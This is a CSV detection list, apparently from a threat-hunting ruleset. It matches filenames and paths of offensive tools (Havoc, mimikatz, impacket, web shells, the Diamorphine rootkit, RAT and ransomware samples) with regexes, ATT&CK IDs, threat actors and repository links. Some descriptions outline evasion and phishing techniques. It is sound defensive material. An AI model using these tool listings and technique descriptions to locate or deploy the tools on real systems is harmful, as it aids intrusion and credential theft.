"*\DeleteRecordbyTerminateProcessEx.exe*",".{0,1000}\\DeleteRecordbyTerminateProcessEx\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14879"
"*\DeleteRecord-EvtExportLog.cpp*",".{0,1000}\\DeleteRecord\-EvtExportLog\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14880"
"*\DeleteRecord-EvtExportLog.exe*",".{0,1000}\\DeleteRecord\-EvtExportLog\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14881"
"*\DeleteRecordofFile.exe*",".{0,1000}\\DeleteRecordofFile\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14882"
"*\DeleteRecordofFileEx.exe*",".{0,1000}\\DeleteRecordofFileEx\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14883"
"*\DeleteWD.dll*",".{0,1000}\\DeleteWD\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","14884"
"*\delkeyhkcuregistry.py*",".{0,1000}\\delkeyhkcuregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14885"
"*\delkeyhkcuregistry.txt*",".{0,1000}\\delkeyhkcuregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14886"
"*\Delregkey_hkcu.txt*",".{0,1000}\\Delregkey_hkcu\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14887"
"*\Delregvalue_hkcu.txt*",".{0,1000}\\Delregvalue_hkcu\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14888"
"*\delvaluehkcuregistry.py*",".{0,1000}\\delvaluehkcuregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14889"
"*\delvaluehkcuregistry.txt*",".{0,1000}\\delvaluehkcuregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14890"
"*\dementor.py*",".{0,1000}\\dementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","14891"
"*\demiguise.py*",".{0,1000}\\demiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","14892"
"*\Demo\VulnApp.exe*",".{0,1000}\\Demo\\VulnApp\.exe.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","14893"
"*\demon.dll*",".{0,1000}\\demon\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","14894"
"*\demon.x64.bin*",".{0,1000}\\demon\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","14895"
"*\demon.x64.exe*",".{0,1000}\\demon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","14896"
"*\demon1.dll*",".{0,1000}\\demon1\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","14897"
"*\demosyscalls.exe*",".{0,1000}\\demosyscalls\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","14898"
"*\Dendrobate\*",".{0,1000}\\Dendrobate\\.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","14899"
"*\Dendron.bin*",".{0,1000}\\Dendron\.bin.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","14900"
"*\Dendron.exe*",".{0,1000}\\Dendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","14901"
"*\Dendron.sln*",".{0,1000}\\Dendron\.sln.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","14902"
"*\DenyOutboundFirewall.ahk*",".{0,1000}\\DenyOutboundFirewall\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14903"
"*\DeployPrinterNightmare.exe*",".{0,1000}\\DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","14904"
"*\DeployPrinterNightmare.exe*",".{0,1000}\\DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","14905"
"*\Derek.Admin.STANNCENTER\Source\Repos\*",".{0,1000}\\Derek\.Admin\.STANNCENTER\\Source\\Repos\\.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#content","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14906"
"*\DesckVB Rat.exe*",".{0,1000}\\DesckVB\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14907"
"*\describeTicket.py*",".{0,1000}\\describeTicket\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14908"
"*\desktop.ini.smukx*",".{0,1000}\\desktop\.ini\.smukx.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","14909"
"*\Desktop\*.dedsec*",".{0,1000}\\Desktop\\.{0,1000}\.dedsec.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","14910"
"*\Desktop\FakeText.lnk*",".{0,1000}\\Desktop\\FakeText\.lnk.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","14911"
"*\DesktopShell.exe*",".{0,1000}\\DesktopShell\.exe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","14912"
"*\Development\GOLD-BACKDOOR\*",".{0,1000}\\Development\\GOLD\-BACKDOOR\\.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","14913"
"*\Device\mimidrv*",".{0,1000}\\Device\\mimidrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","14914"
"*\Device\NamedPipe\NamedPipeMaster*",".{0,1000}\\Device\\NamedPipe\\NamedPipeMaster.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","14915"
"*\Devils-Rat *.exe*",".{0,1000}\\Devils\-Rat\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14916"
"*\Devils-Rat 8.0.exe*",".{0,1000}\\Devils\-Rat\s8\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14917"
"*\devilzShell.asp*",".{0,1000}\\devilzShell\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14918"
"*\devilzShell.cgi*",".{0,1000}\\devilzShell\.cgi.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14919"
"*\devilzShell.jsp*",".{0,1000}\\devilzShell\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14920"
"*\devilzShell.php*",".{0,1000}\\devilzShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14921"
"*\DFSCoerce.exe*",".{0,1000}\\DFSCoerce\.exe.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","14923"
"*\dfscoerce.py*",".{0,1000}\\dfscoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","14924"
"*\DGPOEdit.zip*",".{0,1000}\\DGPOEdit\.zip.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","N/A","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","14925"
"*\Dialupass.cfg*",".{0,1000}\\Dialupass\.cfg.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14926"
"*\Diamond RAT Cracked.exe*",".{0,1000}\\Diamond\sRAT\sCracked\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14927"
"*\diamorphine.c*",".{0,1000}\\diamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","14928"
"*\diamorphine.h*",".{0,1000}\\diamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","14929"
"*\diavol1.txt*",".{0,1000}\\diavol1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14930"
"*\diavol2.txt*",".{0,1000}\\diavol2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14931"
"*\DigitalOceanProxyTab.java*",".{0,1000}\\DigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","14932"
"*\DInjector.sln*",".{0,1000}\\DInjector\.sln.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","14933"
"*\DInjector\*",".{0,1000}\\DInjector\\.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","14934"
"*\dirbuster.py*",".{0,1000}\\dirbuster\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14935"
"*\dircreate2system.pdb*",".{0,1000}\\dircreate2system\.pdb.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","14936"
"*\dircreate2system.sln*",".{0,1000}dircreate2system\.sln.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","14937"
